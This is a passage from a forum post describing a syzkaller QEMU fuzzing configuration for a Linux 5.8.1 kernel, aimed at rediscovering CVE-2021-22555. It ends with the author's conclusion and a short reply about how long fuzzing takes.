    "type": "qemu",
    "vm": {
        "count": 6,
        "kernel": "/root/linux-5.8.1/arch/x86/boot/bzImage",
        "cpu": 2,
        "mem": 1024
    }
}

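The target is set to linux/386 because of the syzkaller source change above: the system that actually runs is 64-bit, and syzkaller merely feeds it 32-bit programs.

The paths below it are filled in according to the actual working directories. The count, cpu and mem parameters are the number of virtual machines, the number of CPUs and the amount of memory; set them as high as the physical host allows.

After that, fuzzing can be started with syz-manager, passing it the configuration file written above.

First-time syzkaller users may wonder why all the virtual machines stop after running for a while. This is because syzkaller periodically has to verify the crashes it has found and generate C code for them.

In short, be patient while fuzzing.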

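Conclusion

The fuzzing part of this article was more or less finished last November, but a change at work delayed it for a long time. In any case, getting it published is what counts. Besides fuzzing, the vulnerability also has an exploitation part, so there should be one more article; I will put it out when I find the time.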



Last edited by pureGavin on 2024-6-11 10:33. Reason: added content
Latest replies (1)
pureGavin 2 2024-6-7 09:46
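Fuzzing takes a very long time. I even ended up finding many other bugs without ever hitting CVE-2021-22555. Fuzzing is by nature a time-consuming job; fortunately, compared with the exploitation that follows, the fuzzing part is still fairly simple.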